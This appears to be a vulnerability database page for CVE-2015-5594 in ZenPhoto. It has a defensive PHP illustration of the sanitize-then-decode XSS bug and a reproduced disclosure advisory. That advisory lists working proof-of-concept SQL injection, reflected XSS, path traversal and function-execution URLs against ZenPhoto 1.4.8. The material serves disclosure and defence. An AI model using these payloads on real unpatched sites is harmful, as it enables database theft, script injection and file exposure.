CVE-2015-5594
Description
The sanitize_string function in ZenPhoto before 1.4.9 applied the html_entity_decode function after input sanitization, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string.
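The ordering problem named in the description is the whole bug: a sanitizer that removes markup and then decodes HTML entities re-creates the markup it just removed. The following is an added illustration written for this page, not ZenPhoto's own sanitize_string code; it uses a hypothetical strip_tags-based sanitizer and a constructed input, and only the order of the two calls is meant to match the CVE.

```php
<?php
// Added illustration of the sanitize-then-decode ordering bug (CVE-2015-5594).
// The sanitizer below is a simplified, hypothetical stand-in, not ZenPhoto's
// real sanitize_string(); what matters is the order of the two operations.

// Vulnerable ordering: strip markup first, decode entities afterwards.
// strip_tags() only sees literal '<' and '>', so an entity-encoded tag passes
// through untouched, and html_entity_decode() then turns it into real markup.
function sanitize_then_decode(string $input): string
{
    $clean = strip_tags($input);
    return html_entity_decode($clean, ENT_QUOTES, 'UTF-8');
}

// Hardened ordering: decode first so the sanitizer operates on the characters
// the browser would actually see, strip markup, then escape on output so that
// whatever remains can never be interpreted as HTML.
function decode_then_sanitize(string $input): string
{
    $decoded = html_entity_decode($input, ENT_QUOTES, 'UTF-8');
    $clean   = strip_tags($decoded);
    return htmlspecialchars($clean, ENT_QUOTES, 'UTF-8');
}

// Small regression check a defender can keep in a test suite: after
// sanitization, no raw '<' or '>' may survive in the output.
function contains_raw_markup(string $output): bool
{
    return strpbrk($output, '<>') !== false;
}

// Constructed sample input: an entity-encoded tag, the shape a user can
// submit through a query-string parameter.
$input = '&lt;b&gt;hello&lt;/b&gt;';

$vulnerable = sanitize_then_decode($input);
$hardened   = decode_then_sanitize($input);

printf("sanitize-then-decode : %s (raw markup: %s)\n",
    $vulnerable, contains_raw_markup($vulnerable) ? 'yes' : 'no');
printf("decode-then-sanitize : %s (raw markup: %s)\n",
    $hardened, contains_raw_markup($hardened) ? 'yes' : 'no');
```

With the constructed input, the vulnerable ordering returns the literal bold tags around "hello", while the hardened ordering returns plain "hello" and contains_raw_markup() reports no markup. The same check applied to any sanitizer that decodes entities at all is the cheapest way to catch this bug class in code review: decoding must happen before, never after, the step that is supposed to remove or neutralize markup, and output should be escaped for the context it is written into regardless.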
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ZenPhoto 1.4.8 - Multiple Vulnerabilities
Vulnerability: SQL Injection, Reflected XSS, Path Traversal
Affected Software: ZenPhoto (http://www.zenphoto.org/)
Affected Version: 1.4.8 (probably also prior versions)
Patched Version: 1.4.9
Risk: Medium
Vendor Contacted: 2015-05-18
Vendor Fix: 2015-07-09
Public Disclosure: 2015-07-10
SQL Injection
=============
There are multiple second order error based SQL injections into the
ORDER BY keyword in the admin area.
- visit zp-core/admin-options.php?saved&tab=gallery
alternatively visit zp-core/admin-options.php?saved&tab=image
- Set "Sort gallery by" to "Custom"
- set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
version())))%23"
- visit zp-core/admin-upload.php?page=upload&tab=http&type=images
- alternatively, visiting any of these will also trigger the injection:
/
zp-core/admin-edit.php
zp-core/admin-users.php?page=users
zp-core/admin-themes.php
The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
zp-core/admin-logs.php?page=logs
XSS 1
=====
http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
The payload must first be HTML entity-encoded, and then URL encoded.
XSS 2
=====
http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error="
onmouseover="alert('xsstest')" foo="bar&msg=hover over me!
Directory Traversal
===================
For an admin, it is possible to view and edit any PHP or inc files, not
just the ones inside the theme directory.
http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php
Execute Function
================
An admin user can execute any function they want via this URL (there is
no CSRF protection for it):
localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo
This gives up some control over the control flow of the site, which
might cause problems, especially considering the missing CSRF protection.
Source
======
http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| zenphoto | zenphoto | up to and including 1.4.8 | 1.4.9 |
References
- http://cve.killedkenny.io/cve/CVE-2015-5594
- http://www.openwall.com/lists/oss-security/2015/07/18/3
- http://www.zenphoto.org/news/zenphoto-1.4.9
- https://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/
CWEs
CWE-79